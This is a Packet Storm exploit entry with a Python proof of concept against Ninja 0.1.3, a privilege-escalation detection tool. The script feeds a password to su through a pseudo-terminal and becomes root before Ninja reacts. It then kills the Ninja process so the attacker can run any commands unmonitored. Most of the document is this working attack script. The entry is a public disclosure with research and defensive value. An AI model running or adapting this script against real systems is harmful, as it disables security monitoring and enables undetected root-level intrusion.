Ninja 0.1.3 Race Condition

2015-04-29T00:00:00
ID PACKETSTORM:131686
Type packetstorm
Reporter Ben Sheppard
Modified 2015-04-29T00:00:00

Description

                                        
                                            `#[Title] Ninja privilege escalation detection and prevention system race condition  
#[Author] Ben 'highjack' Sheppard  
#[URL] http://highjack.github.io/  
#[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.  
#It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.  
#The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.  
#[Software Link] http://forkbomb.org/ninja/  
#[Date] 29/04/2015  
#[Version] 0.1.3  
#[Tested on] Kali Linux  
#[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg  
  
#See me hitting every open port, 'cause im banging on their system while I'm staying out of the court  
#https://www.youtube.com/watch?v=eA136fOsSeQ  
  
import pty, os, sys, subprocess  
pid, fd = pty.fork()  
  
#begin config  
user = "root"  
password = "mypassword" #change this :)  
command = "killall -9 ninja"  
#end config  
  
  
def usage():  
print """  
@@@ @@@ @@@ @@@@@@@@ @@@ @@@ @@@ @@@@@@ @@@@@@@ @@@ @@@   
@@@ @@@ @@@ @@@@@@@@@ @@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@ @@@   
@@! @@@ @@! !@@ @@! @@@ @@! @@! @@@ !@@ @@! !@@   
!@! @!@ !@! !@! !@! @!@ !@! !@! @!@ !@! !@! @!!   
@!@!@!@! !!@ !@! @!@!@ @!@!@!@! !!@ @!@!@!@! !@! @!@@!@!   
!!!@!!!! !!! !!! !!@!! !!!@!!!! !!! !!!@!!!! !!! !!@!!!   
!!: !!! !!: :!! !!: !!: !!! !!: !!: !!! :!! !!: :!!   
:!: !:! :!: :!: !:: :!: !:! !!: :!: :!: !:! :!: :!: !:!   
:: ::: :: ::: :::: :: ::: ::: : :: :: ::: ::: ::: :: :::   
: : : : :: :: : : : : : ::: : : : :: :: : : :::   
  
[Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition  
[Author] Ben 'highjack' Sheppard  
[URL] http://highjack.github.io/  
  
[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.  
It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.  
The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.  
"""  
  
  
executions = 0  
def check_procs():  
p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE)  
p2 = subprocess.Popen(["grep", "root"], stdin=p1.stdout, stdout=subprocess.PIPE)  
p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE)  
output = p3.communicate()[0]  
if output != "":  
if executions != 0:  
sys.exit(0)  
return True  
else:  
return False  
  
def kill_ninja():  
if pid == 0:  
os.execvp("su", ["su", user, "-c", command])  
elif pid > 0:  
try:  
os.read(fd, 1024)  
os.write(fd, password + "\n")  
os.read(fd,1024)  
os.wait()  
os.close(fd)  
except:  
usage()  
print "[+] Ninja is terminated"  
sys.exit(0)  
  
  
while True:  
kill_ninja()  
if (check_procs == True):  
executions = executions + 1  
kill_ninja()  
  
`